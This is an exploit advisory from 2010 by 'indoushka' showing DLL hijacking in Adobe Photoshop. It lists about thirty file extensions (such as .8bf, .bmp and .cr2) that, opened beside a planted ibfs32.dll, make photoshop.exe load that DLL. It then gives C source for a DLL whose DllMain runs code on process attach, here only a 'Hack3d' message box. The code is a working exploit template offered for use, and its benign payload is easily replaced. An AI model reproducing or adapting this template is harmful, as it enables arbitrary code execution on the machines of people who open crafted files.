######################################################################## # Vendor: http://www.Adobe.com/ # Date: 2010-07-27 # Author : indoushka # Thanks to : Dz-Ghost Team # Contact : http://www.hack-r1z.com/cc/ # Tested on : windows SP2 Francais V.(Pnx2 2.0) ######################################################################## # Exploit By indoushka ------------- wvs.exe ------- exploited photoshop.exe with exploit.8bc using ibfs32.dll exploited photoshop.exe with exploit.8be using ibfs32.dll exploited photoshop.exe with exploit.8bf using ibfs32.dll exploited photoshop.exe with exploit.8bi using ibfs32.dll exploited photoshop.exe with exploit.8bp using ibfs32.dll exploited photoshop.exe with exploit.8bs using ibfs32.dll exploited photoshop.exe with exploit.8bx using ibfs32.dll exploited photoshop.exe with exploit.8by using ibfs32.dll exploited photoshop.exe with exploit.8li using ibfs32.dll exploited photoshop.exe with exploit.acf using ibfs32.dll exploited photoshop.exe with exploit.aco using ibfs32.dll exploited photoshop.exe with exploit.ado using ibfs32.dll exploited photoshop.exe with exploit.ahs using ibfs32.dll exploited photoshop.exe with exploit.ahu using ibfs32.dll exploited photoshop.exe with exploit.amp using ibfs32.dll exploited photoshop.exe with exploit.api using ibfs32.dll exploited photoshop.exe with exploit.apl using ibfs32.dll exploited photoshop.exe with exploit.atf using ibfs32.dll exploited photoshop.exe with exploit.axt using ibfs32.dll exploited photoshop.exe with exploit.bmp using ibfs32.dll exploited photoshop.exe with exploit.cin using ibfs32.dll exploited photoshop.exe with exploit.cr2 using ibfs32.dll exploited photoshop.exe with exploit.crw using ibfs32.dll exploited photoshop.exe with exploit.csh using ibfs32.dll exploited photoshop.exe with exploit.dcr using ibfs32.dll exploited photoshop.exe with exploit.ffo using ibfs32.dll exploited photoshop.exe with exploit.mos using ibfs32.dll exploited photoshop.exe with exploit.orf using ibfs32.dll ------------- #include "stdafx.h" #include "stdlib.h" void init() { MessageBox(NULL,"indoushka", "Hack3d",0x00000003); } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: init();break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }